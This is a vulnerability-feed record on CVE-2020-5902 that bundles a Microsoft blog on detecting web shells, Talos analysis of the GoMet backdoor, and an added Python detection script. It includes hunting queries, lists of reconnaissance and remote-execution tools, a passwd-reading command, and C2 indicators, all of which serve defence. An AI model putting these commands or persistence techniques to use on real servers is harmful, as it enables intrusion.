attackers scan the internet, often using public scanning interfaces like [shodan.io](<https://www.shodan.io/>), to locate servers to target. They may use previously fixed vulnerabilities that unfortunately remain unpatched in many servers, but they are also known to quickly take advantage of newly disclosed vulnerabilities.\n\nFor example, on June 30, F5 Networks released a patch for CVE-2020-5902, a remote code execution (RCE) vulnerability in Traffic Management User Interface (TMUI). The vulnerability is a [directory traversal bug](<https://owasp.org/www-community/attacks/Path_Traversal>) with a CVSS score of 9.8 out of a possible 10. Just four days later, on July 4, exploit code was added to a Metasploit module.\n\n\n\n_Figure 2. 
CVE-2020-5902 exploit code_\n\nThe following day, Microsoft researchers started seeing the exploit being used by attackers to upload a web shell to vulnerable servers. The web shell was used to run common cryptocurrency miners. In the days that followed, industry security researchers saw the exploit being broadly used to deploy web shells, with multiple variants surfacing not long after.\n\nThis incident demonstrates the importance of keeping servers up to date and hardened against web shell attacks. Web servers are frequently accessible from the internet and can be used by attackers to gain access to a network.\n\n## Web shells as persistence mechanisms\n\nOnce installed on a server, web shells serve as one of the most effective means of persistence in an enterprise. We frequently see cases where web shells are used solely as a persistence mechanism. Web shells guarantee that a backdoor exists in a compromised network, because an attacker leaves a malicious implant after establishing an initial foothold on a server. If left undetected, web shells provide a way for attackers to continue to gather data from and monetize the networks that they have access to.\n\nCompromise recovery cannot be successful and enduring without locating and removing attacker persistence mechanisms. And while rebuilding a single compromised system is a great solution, restoring existing assets is the only feasible option for many. So, finding and removing all backdoors is a critical aspect of compromise recovery.\n\nAnd this brings us back to the challenge of web shell detection. As we mentioned earlier, web shells can be generalized as a means of executing arbitrary attacker input by way of an implant. The first challenge is dealing with just how many ways an attacker can execute code. 
Web applications support a great array of languages and frameworks and, thus, provide a high degree of flexibility and compatibility that attackers take advantage of.\n\nIn addition, the volume of network traffic plus the usual noise of constant internet attacks means that targeted traffic aimed at a web server can blend right in, making detection of web shells a lot harder and requiring advanced behavior-based detections that can identify and stop malicious activities that hide in plain sight.\n\n## Challenges in detecting web shells\n\nWeb shells can be built using any of several languages that are popular with web applications. Within each language, there are several means of executing arbitrary commands and there are multiple means for arbitrary attacker input. Attackers can also hide instructions in the user agent string or any of the parameters that get passed during a web server/client exchange.\n\nAttackers combine all these options into just a couple of bytes to produce a web shell, for example:\n\n\n\n_Figure 3. Example of web shell code_\n\nIn the example above, the only readable word in the web shell is \u201ceval\u201d, which can be easy to miss or misinterpret. When analyzing script, it is important to leverage contextual clues. For example, a scheduled task called \u201cUpdate Google\u201d that downloads and runs code from a suspicious website should be inspected more closely.\n\nWith web shells, analyzing context can be a challenge because the context is not clear until the shell is used. In the following code, the most useful clues are \u201csystem\u201d and \u201ccat /etc/passwd\u201d, but they do not appear until the attacker interacts with the web shell:\n\n\n\n_Figure 4. Another example of web shell code_\n\nAnother challenge in detecting web shells is uncovering intent. A harmless-seeming script can be malicious depending on intent. 
But when attackers can upload arbitrary input files in the web directory, then they can upload a full-featured web shell that allows arbitrary code execution\u2014which some very simple web shells do.\n\nThese file-upload web shells are simple, lightweight, and easily overlooked because they cannot execute attacker commands on their own. Instead, they can only upload files, such as full-featured web shells, onto web servers. Because of their simplicity, they are difficult to detect and can be dismissed as benign, and so they are often used by attackers for persistence or for early stages of exploitation.\n\nFinally, attackers are known to hide web shells in non-executable file formats, such as media files. Web servers configured to execute server-side code create additional challenges for detecting web shells, because on a web server, a media file is scanned for server-side execution instructions. Attackers can hide web shell scripts within a photo and upload it to a web server. When this file is loaded and analyzed on a workstation, the photo is harmless. But when a web browser asks a server for this file, malicious code executes server side.\n\nThese challenges in detecting web shells contribute to their increasing popularity as an attack tool. We constantly monitor how these evasive threats are utilized in cyberattacks, and we continue to improve protections. In the next section, we discuss how behavior-based detection technologies help us protect customers from web shell attacks.\n\n## How Microsoft helps defend networks against web shell attacks\n\nGaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. To tackle challenges in detecting these threats, [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) uses a combination of durable protections that prevent web shell installation and behavior-based detections that identify related malicious activity. 
Microsoft Defender for Endpoint exposes malicious behavior by analyzing script file writes and process executions. Due to the nature of web shells, static analysis is not effective\u2014as we have shown, it is relatively easy to modify web shells and bypass static protections. To effectively deliver protection, Microsoft Defender for Endpoint uses multiple layers of protection through behavior inspection.\n\n[Behavior-based blocking and containment capabilities](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/behavioral-blocking-containment>), which use engines that specialize in detecting threats by analyzing behavior, monitor web-accessible directories for any new script file creation. While file creation events alone cannot be treated as suspicious, correlating such events with the responsible process tree can yield more reliable signals and surface malicious attempts. The engine can then remediate the script, neutralizing the primary infection vector. For example, IIS instance (_w3wp.exe_) running suspicious processes such as \u2018_cmd.exe /c echo\u2019_, \u2018_certutil.exe\u2019_, or \u2018_powershell.exe\u2019_ that result in the creation of script files in web-accessible folders is a rare event and is, thus, typically a strong sign of web server compromise and web shell installation.\n\n\n\n\n\nMicrosoft Defender for Endpoint also detects web shell installation attempts originating from remote systems within the organization using various lateral movement methods. For example, attackers have been observed to drop web shells through Windows Remote Management (WinRM) or use existing Windows commands to transfer web shells over SMB. On the web server, these remote actions are carried out by system processes, thus giving visibility into the process tree. 
System privilege process dropping script files is another suspicious event and provides the behavior inspection engines ways to remediate the script before the attackers can perform any malicious actions.\n\n\n\n\n\nBehavior-based protection also provides post-compromise defense in scenarios where attackers are already operating and running commands on web servers. Once attackers gain access to a server, one of their first steps is to understand the privilege and the environment they have access to by using built-in reconnaissance commands that are not typically used by web applications. IIS instance (_w3wp.exe_) running commands like _\u2018net\u2019_, _\u2018whoami\u2019_, _\u2018dir\u2019_, _\u2018cmd.exe\u2019_, or _\u2018query\u2019_, to name a few, is typically a strong early indicator of web shell activity.\n\nIIS servers have built-in management tools used by administrators to perform various maintenance tasks. These platforms surface various PowerShell cmdlets that can expose critical information to the attackers. IIS instances (_w3wp.exe_) that host various web-facing client services such as Outlook on the web (formerly known as Outlook Web App or OWA) or Exchange admin center (EAC; formerly known as the Exchange Control Panel or ECP) accessing the management platform or executing below cmdlets is a suspicious activity and signifies a hands-on-keyboard attack. The behavior engine monitors execution of such cmdlets and the responsible process trees, for example:\n\n\n\nWith its behavior-based blocking and containment capabilities, Microsoft Defender for Endpoint can identify and stop behavior associated with web shell attacks. It raises alerts for these detections, enabling security operations teams to use the rich investigation tools in Microsoft Defender for Endpoint to perform additional investigation and hunting for related or similar threats.\n\n\n\n\n\n_Figure 5. 
Microsoft Defender for Endpoint alerts for behaviors related to web shell attacks_\n\nMicrosoft 365 Defender and Microsoft Defender for Endpoint customers can also run advanced hunting queries to proactively hunt for web shell attacks:\n\nLook for suspicious processes that the IIS worker process (w3wp.exe), Apache HTTP server processes (_httpd.exe_, _visualsvnserver.exe_), etc. do not typically initiate (e.g., _cmd.exe_ and _powershell.exe_)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_any(\"beasvc.exe\",\"coldfusion.exe\",\"httpd.exe\",\"owstimer.exe\",\"visualsvnserver.exe\",\"w3wp.exe\") or InitiatingProcessCommandLine contains 'tomcat'\n | where FileName != \"csc.exe\" // exclude csharp compiler\n | where FileName != \"php-cgi.exe\" //exclude php group, fast cgi\n | where FileName != \"vbc.exe\" //exclude Visual Basic Command Line Compiler\n | summarize by FileName\n\nLook for suspicious web shell execution; this can identify processes that are associated with remote execution and reconnaissance activity (example: "arp", "certutil", "cmd", "echo", "ipconfig", "gpresult", "hostname", "net", "netstat", "nltest", "nslookup", "ping", "powershell", "psexec", "qwinsta", "route", "systeminfo", "tasklist", "wget", "whoami", "wmic", etc.)\n \n \n DeviceProcessEvents\n | where InitiatingProcessParentFileName in~(\"beasvc.exe\",\"coldfusion.exe\",\"httpd.exe\",\"owstimer.exe\",\"visualsvnserver.exe\",\"w3wp.exe\") or InitiatingProcessParentFileName startswith \"tomcat\"\n | where InitiatingProcessFileName in~(\"powershell.exe\",\"powershell_ise.exe\",\"cmd.exe\")\n | where FileName != 'conhost.exe'\n\n## Hardening servers against web shells\n\nA single web shell allowing attackers to remotely run commands on a server can have far-reaching consequences. With script-based malware, however, everything eventually funnels to a few natural chokepoints, such as _cmd.exe_, _powershell.exe_, and _cscript.exe_. 
As with most attack vectors, prevention is critical.\n\nOrganizations can harden systems against web shell attacks by taking these preventive steps:\n\n * Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Use Threat and Vulnerability Management to discover and fix these weaknesses. Deploy the latest security updates as soon as they become available.\n * Implement proper segmentation of your perimeter network, such that a compromised web server does not lead to the compromise of the enterprise network.\n * Enable antivirus protection on web servers. [Turn on cloud-delivered protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) to get the latest defenses against new and emerging threats. Users should only be able to upload files in directories that can be scanned by antivirus and configured to not allow server-side scripting or execution.\n * Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.\n * Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible, limiting lateral movement, as well as other attack activities.\n * Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.\n * Practice good credential hygiene. Limit the use of accounts with local or domain admin level privileges.\n\nWeb shells and the attacks that they enable are a multi-faceted threat that requires comprehensive visibility across domains and platforms. [Microsoft 365 Defender](<https://aka.ms/m365d>) correlates threat data from endpoints, email and data, identities, and apps to coordinate cross-domain protection. 
[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\n_Detection and Response Team (DART)_\n\n_Microsoft Defender Security Research Team_\n\n \n\nThe post [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-11T17:00:05", "type": "mssecure", "title": "Web shell attacks continue to rise", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-02-11T17:00:05", "id": "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "href": "https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File disclosure vulnerability in F5 BIG-IP Traffic Management User Interface\n\nVulnerability Type: File 
Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-05T00:00:00", "type": "dsquare", "title": "F5 BIG-IP Traffic Management User Interface File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-05T00:00:00", "id": "E-709", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-07-07T09:54:15", "description": "By Jon Munshaw. Cisco Talos just released Snort coverage for a prominent vulnerability in F5\u2019s BIG-IP. BIG-IP is one of the most popular networking products on the modern market. This product is used to shape web traffic, access gateways, limit rates and much more. F5 disclosed a remote code execution over the weekend that was assigned a maximum 10 out of 10 severity score. CVE-2020-5902 is a remote code execution vulnerability in BIG-IP's configuration interface. Users are urged to make... \n \n[[ This is only the beginning! 
Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2020-07-06T14:19:53", "type": "talosblog", "title": "New Snort rule addresses critical vulnerability in F5 BIG-IP", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-06T14:19:53", "id": "TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/WdHAUZcKoHk/snort-rule-f5-rce-critical-vuln.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T15:37:29", "description": " \n \n \n\n\n## Executive summary\n\n \n\n\nSince the Russian invasion of Ukraine began, Ukrainians have been under a [nearly constant barrage of cyber attacks](<https://blogs.cisco.com/news/cisco-stands-on-guard-with-our-customers-in-ukraine>). Working jointly with Ukrainian organizations, Cisco Talos has discovered a fairly uncommon piece of malware targeting Ukraine \u2014 this time aimed at a large software development company whose software is used in various state organizations within Ukraine. We believe that this campaign is likely sourced by Russian state-sponsored actors or those acting in their interests. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor's intent was to gain access to source a supply chain-style attack, though at this time we do not have any evidence that they were successful. Cisco Talos confirmed that the malware is a slightly modified version of the open-source backdoor named \"[GoMet](<https://github.com/Laeeth/GoMet>).\" The malware was first observed on March 28, 2022. \n \n \n\n\n## GoMet backdoor\n\n \n\n\nThe story of this backdoor is rather curious \u2014 there are two documented cases of its usage by sophisticated threat actors. 
First, in 2020, attackers were deploying this malware after the successful exploitation of [CVE-2020-5902](<https://blog.talosintelligence.com/2020/07/snort-rule-f5-rce-critical-vuln.html>), a vulnerability in F5 BIG-IP so severe that USCYBERCOM posted a [tweet](<https://twitter.com/CNMF_CyberAlert/status/1279151966178902016>) urging all users to patch the application. The second is more recent and involved the [successful exploitation](<https://news.sophos.com/en-us/2022/06/15/sophos-uncovers-how-apt-groups-carried-out-highly-targeted-attack/>) of [CVE-2022-1040](<https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce>), a remote code execution vulnerability in Sophos Firewall. \n \nBoth cases are very similar. They both start with the exploitation of a public vulnerability on appliances where the malicious actors then dropped GoMet as a backdoor. As of publishing time, Cisco Talos has no reason to believe these cases are related to the usage of this backdoor in Ukraine. \n \nThe original GoMet author posted the code on GitHub on March 31, 2019 and had commits until April 2, 2019. The commits didn't add any features but did fix some code convention aesthetics. The backdoor itself is a rather simple piece of software written in the Go programming language. It contains nearly all the usual functions an attacker might want in a remotely controlled agent. Agents can be deployed on a variety of operating systems (OS) or architectures (amd64, arm, etc.). GoMet supports job scheduling (via Cron or task scheduler depending on the OS), single command execution, file download, file upload or opening a shell. An additional notable feature of GoMet lies in its ability to daisy chain \u2014 whereby the attackers gain access to a network or machine and then use that same information to gain access to multiple networks and computers \u2014 connections from one implanted host to another. 
Such a feature could allow for communication out to the internet from otherwise completely \"isolated\" hosts. \n \nThis version was changed by the malicious actors: in the original code, the cronjob is configured to be executed once every hour on the hour. In our samples, the cronjob is configured to run every two seconds. This change makes the sample slightly noisier, since it executes every two seconds, but it also prevents an hour-long sleep if the connection fails, which allows for more aggressive reconnection to the C2. \n \nThe objective of the cron job defined in the main part of the malware is to check whether it is connected to the C2; if not, it starts the agent component again and connects to the C2. The picture below shows the execution flow of the C2 setup routine Agent.Start. \n \n\n\n\n\n \nThis flow reveals another change from the GitHub version. If the C2 is unreachable, the sample will sleep for a random amount of time between five and 10 minutes. Go's sleep implementation takes nanoseconds, so the pseudo-code looks like the following: time_Sleep(1000000000 * (rnd_val + 300)). \n \nThe 'WaitGroup_Add' call in the disassembly screenshot can also be confusing. The trick is that the Go compiler turns WaitGroup.Done() in the source code into WaitGroup.Add(-1). \n \nAfter the Agent.Start routine is done, the next cron job triggers the execution of the serve() routine and tries to start another instance of the Agent. \n \nThe simplified source code of the GitHub version looks like this: \n \n\n\n\n\n \n \nThe simplified pseudo-code for the samples in the wild looks like this: \n \n\n\n\n\n \n \nTalos found two samples of this version of the backdoor: \n \nf24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb (FctSec.exe) \n \n950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88 (SQLocalM86.exe) \n \nThese samples have minor differences but are likely built from the same source code, just with a slightly different configuration. 
\n \nIf we look closely at the functions, they are not 100% equal, but we can see that the changes are mainly strings and similar victim- or compiler-dependent data, along with researcher comments. Below is the Main.Main function as an example. \n \n\n\n\n\n \n \nThe malicious activity we detected included fake Windows Update scheduled tasks created by the GoMet dropper. Additionally, the malware used a somewhat novel approach to persistence. It enumerated the autorun values and, instead of creating a new one, replaced one of the existing goodware autorun executables with the malware. This could potentially avoid detection or hinder forensic analysis. \n \nIn one of the cases, about 60 seconds before the schtasks query is executed, a blank CMD process is opened, which then executes systeminfo and schtasks queries, rather than these queries being spawned by svchost, services or another process. This execution looks like: \n \nC:\\WINDOWS\\system32\\cmd.exe 7) \n \nsysteminfo \n \nschtasks /query /tn microsoft\\windows\\windowsupdate\\scheduled \n \nschtasks /query /tn microsoft\\windows\\windowsupdate\\scheduled /v \n \n \n\n\n## Infrastructure\n\n \n\n\nBoth samples have the command and control (C2) IP address hardcoded, which is 111.90.139[.]122. Communication occurs via HTTPS on the default port. \n \nThe certificate on this server was issued on April 4, 2021 as a self-signed certificate, with the SHA-1 fingerprint 9b5e112e683a3605c9481d8f565cfb3b7e2feab7. This indicates that preparation for this campaign began as early as April 2021. At the moment, there are no known domains associated with this IP address, and the last time there was a domain associated with it was on Jan. 23, 2021, which is outside the known attack time frame. \n \n \n\n\n## Conclusion\n\n \n\n\nAs the war in Ukraine rages on with little resolution in sight, we are reminded that attackers will try just about anything to gain additional leverage over their Ukrainian adversaries. 
Cisco Talos expects to see the continued deployment of a range of cyber weapons targeting the Ukrainian government and its counterparts. We remain vigilant and are committed to [helping Ukraine defend its networks](<https://blogs.cisco.com/news/cisco-stands-on-guard-with-our-customers-in-ukraine%23:~:text%3DAs%2520the%2520Russia%252Dled%2520invasion,ensure%2520that%2520nothing%2520goes%2520dark.>) against such cyber attacks and working closely with our strategic allies in the region to gather and [provide actionable threat intelligence](<https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html>). \n \nIn this instance, we saw a software company targeted with a backdoor designed for additional persistent access. We also observed the threat actor take active steps to prevent detection of their tooling by obfuscating samples and utilizing novel persistence techniques. This access could be leveraged in a variety of ways, including deeper access or launching additional attacks, including the potential for software supply chain compromise. It's a reminder that although the cyber activities haven't necessarily risen to the level many have expected, Ukraine is still facing a well-funded, determined adversary that can inflict damage in a variety of ways \u2014 this is just the latest example of those attempts. \n \nWe assess with moderate to high confidence that these actions are being conducted by Russian state-sponsored actors or those acting in their interests. \n \n \n\n\n## Coverage\n\n \nWays our customers can detect and block this threat are listed below. \n \n\n\n\n\n \n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. 
Try Secure Endpoint for free [here.](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Damp-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Damp-free-trial>) \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium%3Dweb-referral%26utm_source%3Dcisco%26utm_campaign%3Dcmd-free-trial-request%26utm_term%3Dpgm-talos-trial>). \n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Network/Cloud Analytics](<https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html>) (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 
\n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Dumbrella-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Dautomated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \n[Cisco Duo](<https://signup.duo.com/?utm_source%3Dtalos%26utm_medium%3Dreferral%26utm_campaign%3Dduo-free-trial>) provides multi-factor authentication for users to ensure only those authorized are accessing your network. \n \nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). 
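The process chain described in the GoMet analysis above (a cmd.exe not launched by svchost or services that, about a minute later, runs systeminfo and schtasks queries for the fake microsoft\windows\windowsupdate\scheduled task) can be turned into a detection over process-creation telemetry. The block below is an added example, not Cisco Talos code or tooling: the pipe-delimited event format, the sample events (including FctSec.exe as the parent of cmd.exe) and the 90-second window are constructed for this example; map your EDR's process-creation fields onto ProcEvent.

```python
r"""Added example (not Cisco Talos code): flag the process chain the GoMet analysis
describes: a cmd.exe that was not launched by svchost.exe/services.exe and that,
within about a minute, runs systeminfo plus schtasks queries for the
microsoft\windows\windowsupdate\scheduled task.  The record format, the sample
events and the window below are constructed for this example."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    ts: datetime
    pid: int
    ppid: int
    image: str          # executable name, lower-case
    parent_image: str   # parent executable name, lower-case
    cmdline: str


# Expected spawners of these queries per the write-up; anything else is suspicious.
SYSTEM_PARENTS = {'svchost.exe', 'services.exe'}
SUSPECT_TASK = r'microsoft\windows\windowsupdate\scheduled'
WINDOW = timedelta(seconds=90)  # write-up: ~60 s from cmd.exe start to the schtasks query


def parse_event(line):
    """Parse one constructed 'ts|pid|ppid|image|parent|cmdline' record."""
    ts, pid, ppid, image, parent, cmdline = line.split('|', 5)
    return ProcEvent(datetime.fromisoformat(ts), int(pid), int(ppid),
                     image.lower(), parent.lower(), cmdline)


def find_gomet_chains(events):
    """Return [(cmd_pid, [matching schtasks command lines])] for each suspicious cmd.exe."""
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    hits = []
    for cmd in events:
        if cmd.image != 'cmd.exe' or cmd.parent_image in SYSTEM_PARENTS:
            continue
        kids = [c for c in children.get(cmd.pid, []) if cmd.ts <= c.ts <= cmd.ts + WINDOW]
        ran_systeminfo = any(c.image == 'systeminfo.exe' for c in kids)
        queries = [c.cmdline for c in kids
                   if c.image == 'schtasks.exe'
                   and '/query' in c.cmdline.lower()
                   and SUSPECT_TASK in c.cmdline.lower()]
        if ran_systeminfo and queries:
            hits.append((cmd.pid, queries))
    return hits


# Constructed telemetry: one chain matching the write-up, one cmd.exe launched by
# svchost.exe (the normal Windows Update path), and one cmd.exe that only runs whoami.
SAMPLE_EVENTS = r'''
2022-03-28T10:00:00|4120|3300|cmd.exe|FctSec.exe|C:\WINDOWS\system32\cmd.exe
2022-03-28T10:00:05|4188|4120|systeminfo.exe|cmd.exe|systeminfo
2022-03-28T10:01:00|4202|4120|schtasks.exe|cmd.exe|schtasks /query /tn microsoft\windows\windowsupdate\scheduled
2022-03-28T10:01:01|4210|4120|schtasks.exe|cmd.exe|schtasks /query /tn microsoft\windows\windowsupdate\scheduled /v
2022-03-28T11:00:00|5000|900|cmd.exe|svchost.exe|C:\WINDOWS\system32\cmd.exe
2022-03-28T11:00:02|5010|5000|schtasks.exe|cmd.exe|schtasks /query /tn microsoft\windows\windowsupdate\scheduled
2022-03-28T12:00:00|6000|2100|cmd.exe|explorer.exe|C:\WINDOWS\system32\cmd.exe
2022-03-28T12:00:01|6010|6000|whoami.exe|cmd.exe|whoami
'''.strip().splitlines()

if __name__ == '__main__':
    for pid, queries in find_gomet_chains([parse_event(l) for l in SAMPLE_EVENTS]):
        print(f'suspicious cmd.exe pid={pid}: {queries}')
```

The parent check is what separates this from ordinary Windows Update housekeeping: the same schtasks query under svchost.exe is normal, so the rule only fires when the shell came from somewhere else and also ran systeminfo in the same window.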
\n \n \n\n\n## Indicators of Compromise\n\n### SHA-256 Hashes\n\nf24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb \n950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88 \n \n\n\n### IPs\n\n111.90.139[.]122", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-21T12:00:00", "type": "talosblog", "title": "Attackers target Ukraine using GoMet backdoor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2022-1040"], "modified": "2022-07-21T13:27:08", "id": "TALOSBLOG:0D782B308C337CFD06D5A38B03FC90B4", "href": "http://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:06:52", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
